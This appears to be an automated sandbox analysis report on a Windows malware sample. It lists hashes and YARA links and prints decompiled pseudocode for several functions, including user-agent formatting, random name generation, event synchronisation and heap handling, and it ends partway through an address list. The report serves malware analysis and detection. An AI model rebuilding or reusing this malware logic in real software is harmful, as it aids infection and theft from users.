Opcode Fuzzy Hash: 82419f256f520b0c41f03777275c3a22a397bb9f77eaaeee5fdb14a3b8341fe3
Instruction Fuzzy Hash: 9FF0F878601240AFE724FF79E88CF167BE8AF04780B088404F543CA26AD721EC81DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00419A67, Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

__CrtCheckMemory.LIBCMTD ref: 00419A8A
__heap_alloc_base.LIBCMTD ref: 00419C17
_memset.LIBCMT ref: 00419D65
_memset.LIBCMT ref: 00419D82
_memset.LIBCMT ref: 00419D9D

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID:
API String ID: 4254127243-0
Opcode ID: fe78a346b433d07a0f6bab1a2110085e55f13dafbea3d6e26ad8c4a09b709803
Instruction ID: c6bf65d604c27fe1dc0c0090835c1609910f45bcef69d46b340ad04691659785
Opcode Fuzzy Hash: fe78a346b433d07a0f6bab1a2110085e55f13dafbea3d6e26ad8c4a09b709803
Instruction Fuzzy Hash: D6B18D74A00205DBDB14CF48ED95BEA77F0BB48304F24816AE9096B391D379AE85CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 03C42F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E03C42F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E03C459A4();
				if(_t21 != 0) {
					_t59 =  *0x3c4d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x3c4d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x3c4d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E03C42B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x3c4d2a8; // 0xcaa5a8
					if( *0x3c4d25c > 5) {
						_t8 = _t26 + 0x3c4e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x3c4e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E03C49154(_t27, _t27);
					_t31 = E03C48E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x3c4d270 =  *0x3c4d270 ^ 0x81bbe65d;
						_t32 = E03C41525(0x60);
						 *0x3c4d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x3c4d32c; // 0x48f95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x3c4d32c; // 0x48f95b0
							 *_t51 = 0x3c4e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x3c4d238, 0, 0x43);
							 *0x3c4d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x3c4d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x3c4d2a8; // 0xcaa5a8
								_t13 = _t58 + 0x3c4e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x3c4c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E03C47A2E( ~_v8 &  *0x3c4d270, 0x3c4d00c); // executed
								_t42 = E03C47FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E03C450E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E03C47C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E03C446B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x3c4d15c(); // executed
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E03C48B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x03c42f70
0x03c42f7b
0x03c42f7e
0x03c42f81
0x03c42f84
0x03c42f8b
0x03c42f8d
0x03c42f99
0x03c42f9b
0x03c42f9b
0x03c42fa4
0x03c42faa
0x03c42faf
0x03c42fc9
0x03c42fd5
0x03c42fd7
0x03c42fdc
0x03c42fe6
0x03c42fe6
0x03c42fde
0x03c42fde
0x03c42fde
0x03c42fde
0x03c42fed
0x03c42ffa
0x03c43001
0x03c43006
0x03c43006
0x03c4300e
0x03c43011
0x03c43037
0x03c43043
0x03c43048
0x03c4304d
0x03c4304f
0x03c4307b
0x03c4307d
0x03c43051
0x03c43055
0x03c4305a
0x03c4305f
0x03c43066
0x03c4306c
0x03c43071
0x03c43077
0x03c4307e
0x03c43080
0x03c43082
0x03c43091
0x03c43097
0x03c4309c
0x03c4309e
0x03c430ce
0x03c430d0
0x03c430a0
0x03c430a0
0x03c430a6
0x03c430b3
0x03c430b9
0x03c430b9
0x03c430c1
0x03c430ca
0x03c430d1
0x03c430d3
0x03c430d5
0x03c430dc
0x03c430e9
0x03c430ee
0x03c430f3
0x03c430f5
0x03c430f7
0x00000000
0x00000000
0x03c430f9
0x03c430fe
0x03c43100
0x03c43107
0x03c4310b
0x03c4310e
0x03c43123
0x03c43127
0x03c4312c
0x00000000
0x03c4312c
0x03c43110
0x03c43112
0x00000000
0x00000000
0x03c4311d
0x03c4311f
0x03c43121
0x00000000
0x00000000
0x00000000
0x03c43121
0x03c43104
0x03c43104
0x03c430d5
0x03c43013
0x03c43013
0x03c43018
0x03c4312e
0x03c43132
0x03c4313a
0x03c4313a
0x00000000
0x03c43132
0x03c4301e
0x03c43021
0x03c4302b
0x03c43032
0x00000000
0x03c43142
0x03c43142
0x03c43146
0x03c4314a
0x03c4314a

APIs

Part of subcall function 03C459A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,03C42F89,00000000,00000000), ref: 03C459B3

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 03C43006

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

memset.NTDLL ref: 03C43055
RtlInitializeCriticalSection.NTDLL(048F9570), ref: 03C43066

Part of subcall function 03C446B2: memset.NTDLL ref: 03C446C7
Part of subcall function 03C446B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 03C44709
Part of subcall function 03C446B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 03C44714

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 03C43091
wsprintfA.USER32 ref: 03C430C1

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: b1dbfd33e8901c866da0f361a5a099f6894636e3fb9e54dd53ee0bf35ef47069
Instruction ID: 3c8136a9cd45a17f65a278618d0386d3ddbbf825c959a91ce84bee1b4788d955
Opcode Fuzzy Hash: b1dbfd33e8901c866da0f361a5a099f6894636e3fb9e54dd53ee0bf35ef47069
Instruction Fuzzy Hash: FF510F7CA00364ABDB21FBB1DC88B6EB7B8AB44710F194865E502EF245E7719E54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03C42D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E03C42D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E03C41525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E03C48B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E03C41525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x3c4d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x03c42d7b
0x03c42d82
0x03c42d87
0x03c42d8a
0x03c42d91
0x03c42d94
0x03c42d97
0x03c42d9c
0x03c42da1
0x03c42ef5
0x03c42ef7
0x03c42ef9
0x03c42efe
0x03c42efe
0x03c42da7
0x03c42daa
0x03c42dad
0x03c42daf
0x03c42daf
0x03c42db3
0x00000000
0x00000000
0x03c42db7
0x03c42de3
0x03c42de8
0x03c42dea
0x03c42dea
0x03c42ded
0x03c42df0
0x03c42df0
0x03c42df2
0x00000000
0x03c42dbd
0x03c42dbf
0x03c42dde
0x03c42dde
0x03c42df5
0x03c42df5
0x03c42df6
0x03c42df6
0x03c42df9
0x00000000
0x00000000
0x00000000
0x03c42df9
0x03c42dc3
0x03c42e0a
0x03c42e0e
0x03c42ee8
0x03c42eea
0x03c42eea
0x03c42eeb
0x03c42eee
0x00000000
0x03c42eee
0x03c42e17
0x03c42e28
0x03c42e2c
0x03c42ee4
0x00000000
0x03c42ee4
0x03c42e32
0x03c42e35
0x03c42e39
0x03c42e3d
0x03c42e42
0x03c42eda
0x03c42eda
0x00000000
0x03c42ee0
0x03c42e4d
0x03c42e56
0x03c42e6a
0x03c42e71
0x03c42e86
0x03c42e8c
0x03c42e94
0x00000000
0x00000000
0x00000000
0x00000000
0x03c42e96
0x03c42e96
0x03c42e96
0x03c42e9d
0x03c42ea5
0x00000000
0x00000000
0x03c42ea7
0x03c42eb0
0x00000000
0x00000000
0x00000000
0x03c42eb2
0x03c42eb4
0x03c42eb7
0x03c42eb7
0x03c42eba
0x03c42ebe
0x03c42ec1
0x03c42ec7
0x03c42eca
0x03c42ed1
0x00000000
0x03c42e4d
0x03c42dc8
0x03c42dd0
0x03c42dd6
0x03c42dd8
0x03c42dd8
0x03c42ddb
0x03c42ddd
0x00000000
0x03c42ddd
0x03c42db7
0x03c42dfd
0x03c42e02
0x03c42e04
0x03c42e04
0x03c42e07
0x03c42e07
0x00000000

APIs

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

lstrcpy.KERNEL32(69B25F45,00000020), ref: 03C42E71
lstrcat.KERNEL32(69B25F45,00000020), ref: 03C42E86
lstrcmp.KERNEL32(00000000,69B25F45), ref: 03C42E9D
lstrlen.KERNEL32(69B25F45), ref: 03C42EC1

Strings

, xrefs: 03C42E0A

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: f6e86cdf17ebbfcad1bb74b8b52bf9ea8f7b78cf31d9b364dcbdf5e7505ae2bd
Instruction ID: ca54b75c77732aac3106d83ac83c6dd611d80dcf9044823efc105613568a78a9
Opcode Fuzzy Hash: f6e86cdf17ebbfcad1bb74b8b52bf9ea8f7b78cf31d9b364dcbdf5e7505ae2bd
Instruction Fuzzy Hash: 30518D31A00218EBCB21DF99C886BADFBB6FF59315F19845AE815DF215C770AB41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 03C46150, Relevance: 7.6, APIs: 5, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C46150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x3c4d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x3c4d2a8; // 0xcaa5a8
				_t3 = _t8 + 0x3c4e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E03C410B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x3c4d2ac, 1, 0, _t30);
					E03C48B22(_t30);
				}
				_t12 =  *0x3c4d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E03C43485(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E03C48F1B(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E03C48B7B(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x03c46151
0x03c46158
0x03c46162
0x03c46166
0x03c4616c
0x03c4617b
0x03c46182
0x03c46186
0x03c46198
0x03c4619a
0x03c4619a
0x03c4619f
0x03c461a6
0x03c461fd
0x03c461fd
0x03c46203
0x03c46205
0x03c46205
0x03c4620a
0x03c4620f
0x03c46213
0x03c46225
0x03c46225
0x03c46229
0x03c4622f
0x03c4622f
0x00000000
0x03c461b6
0x03c461b6
0x03c461bd
0x00000000
0x00000000
0x03c461c4
0x03c461cc
0x03c461d0
0x03c461d4
0x03c461d4
0x03c461dc
0x03c461e1
0x03c461e5
0x03c461e9
0x03c4623e
0x03c46244
0x03c46244
0x03c461f7
0x03c461fb
0x03c46232
0x03c46234
0x03c46237
0x03c46237
0x00000000
0x03c46234
0x03c461fb
0x00000000
0x03c461e5

APIs

Part of subcall function 03C410B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,048F9C18,00000000,?,?,69B25F44,00000005,03C4D00C,?,?,03C430FE), ref: 03C410E7
Part of subcall function 03C410B1: lstrcpy.KERNEL32(00000000,00000000), ref: 03C4110B
Part of subcall function 03C410B1: lstrcat.KERNEL32(00000000,00000000), ref: 03C41113

CreateEventA.KERNEL32(03C4D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?), ref: 03C46191

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

StrChrW.SHLWAPI(03C4991F,00000020,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?), ref: 03C461C4
WaitForSingleObject.KERNEL32(00000000,00004E20,03C4991F,00000000,00000000,?,00000000,?,03C4991F,?,00000001,?,?,?,?,03C47D37), ref: 03C461F1
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?), ref: 03C4621F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,03C4991F,?,00000001,?,?,?,?,03C47D37), ref: 03C46237

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 7089f80afaf4e401d6fe067f33ef1cdabeecc26c96aed18af5e134f581c9e673
Instruction ID: 766a4d78d09af8e85f814c524778ae33c0b6d3c88d580a1a9c702dc1a6eca8ed
Opcode Fuzzy Hash: 7089f80afaf4e401d6fe067f33ef1cdabeecc26c96aed18af5e134f581c9e673
Instruction Fuzzy Hash: 96212636A013116BC731EE789C48B6BB399EB8AB10F0A0625FD86DF10DDB36ED518640

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4030e0 = _t1;
				if(_t1 != 0) {
					 *0x4030f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019A0(); // executed
					_t6 = _t4; // executed
					HeapDestroy( *0x4030e0); // executed
				}
				ExitProcess(_t6);
			}

0x00401d39
0x00401d42
0x00401d48
0x00401d4f
0x00401d58
0x00401d5d
0x00401d63
0x00401d6e
0x00401d70
0x00401d70
0x00401d77

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401D42
GetModuleHandleA.KERNEL32(00000000), ref: 00401D52
GetCommandLineW.KERNEL32 ref: 00401D5D

Part of subcall function 004019A0: NtQuerySystemInformation.NTDLL ref: 004019DF
Part of subcall function 004019A0: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A26
Part of subcall function 004019A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A55
Part of subcall function 004019A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A73
Part of subcall function 004019A0: CreateThread.KERNEL32 ref: 00401A9D
Part of subcall function 004019A0: QueueUserAPC.KERNEL32(004013C4,00000000,?,?,00000000), ref: 00401AB9

HeapDestroy.KERNELBASE ref: 00401D70
ExitProcess.KERNEL32 ref: 00401D77

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 2501132232-0
Opcode ID: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction ID: 05a8c36faf6c528b4ee69dbfea55c2bb6b45a73a18d0234de67205c8428d1488
Opcode Fuzzy Hash: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction Fuzzy Hash: B5E0B6709027209BC3212F71AF0DB4B3E68BF057927044536F606F22B4D7B84500CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 03C45319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E03C4155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x3c4d2a8; // 0xcaa5a8
				_t4 = _t24 + 0x3c4edc0; // 0x48f9368
				_t5 = _t24 + 0x3c4ed68; // 0x4f0053
				_t26 = E03C45D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x3c4d2a8; // 0xcaa5a8
						_t11 = _t32 + 0x3c4edb4; // 0x48f935c
						_t48 = _t11;
						_t12 = _t32 + 0x3c4ed68; // 0x4f0053
						_t52 = E03C4272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x3c4d2a8; // 0xcaa5a8
							_t13 = _t35 + 0x3c4edfe; // 0x30314549
							if(E03C45B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x3c4d25c - 6;
								if( *0x3c4d25c <= 6) {
									_t42 =  *0x3c4d2a8; // 0xcaa5a8
									_t15 = _t42 + 0x3c4ec0a; // 0x52384549
									E03C45B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x3c4d2a8; // 0xcaa5a8
							_t17 = _t38 + 0x3c4edf8; // 0x48f93a0
							_t18 = _t38 + 0x3c4edd0; // 0x680043
							_t45 = E03C44538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x3c4d238, 0, _t52);
						}
					}
					HeapFree( *0x3c4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E03C44FF0(_t54);
				}
				return _t45;
			}

0x03c45319
0x03c45329
0x03c4532c
0x03c45333
0x03c45335
0x03c45335
0x03c45338
0x03c4533d
0x03c45344
0x03c45351
0x03c45356
0x03c4535a
0x03c45368
0x03c45376
0x03c4537a
0x03c4540b
0x03c4540b
0x03c45380
0x03c45380
0x03c45385
0x03c45385
0x03c4538c
0x03c45398
0x03c4539a
0x03c4539c
0x03c4539e
0x03c453a5
0x03c453b7
0x03c453b9
0x03c453c0
0x03c453c2
0x03c453c9
0x03c453d4
0x03c453d4
0x03c453c0
0x03c453d9
0x03c453de
0x03c453e5
0x03c45403
0x03c45405
0x03c45405
0x03c4539c
0x03c45417
0x03c45417
0x03c45419
0x03c4541e
0x03c45420
0x03c45420
0x03c4542b

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,048F9368,00000000,?,74E5F710,00000000,74E5F730), ref: 03C45368
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,048F93A0,?,00000000,30314549,00000014,004F0053,048F935C), ref: 03C45405
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,03C47CCB), ref: 03C45417

Strings

Ut, xrefs: 03C4536E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 5748b033dfb65fbe418fda7073fc5ec2308ba81b202629a909a517469dd3c2ba
Instruction ID: b437d0901282b6bf8a523fd0e31ed1cbc7afc71ff95d32936c2185c627ac91a8
Opcode Fuzzy Hash: 5748b033dfb65fbe418fda7073fc5ec2308ba81b202629a909a517469dd3c2ba
Instruction Fuzzy Hash: E631A17A900208BFDB21FBA5EC48E9EBBBDEB45700F1601A5F601DB161D770AE45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03C42C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E03C42C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x3c4d340; // 0x48f9c08
				_push(0x800);
				_push(0);
				_push( *0x3c4d238);
				if( *0x3c4d24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x3c4d24c =  *0x3c4d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E03C42C0D(_t44, _t40); // executed
						_t18 = E03C431A8(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x3c4d24c < 5) {
								 *0x3c4d24c =  *0x3c4d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E03C45433();
						HeapFree( *0x3c4d238, 0, _t40);
						goto L10;
					}
					_t24 = E03C49BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E03C45450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x03c42c58
0x03c42c58
0x03c42c5b
0x03c42c5c
0x03c42c66
0x03c42c6d
0x03c42c72
0x03c42c74
0x03c42c7a
0x03c42c9a
0x03c42ca2
0x03c42cba
0x03c42cbc
0x03c42cbd
0x03c42cbf
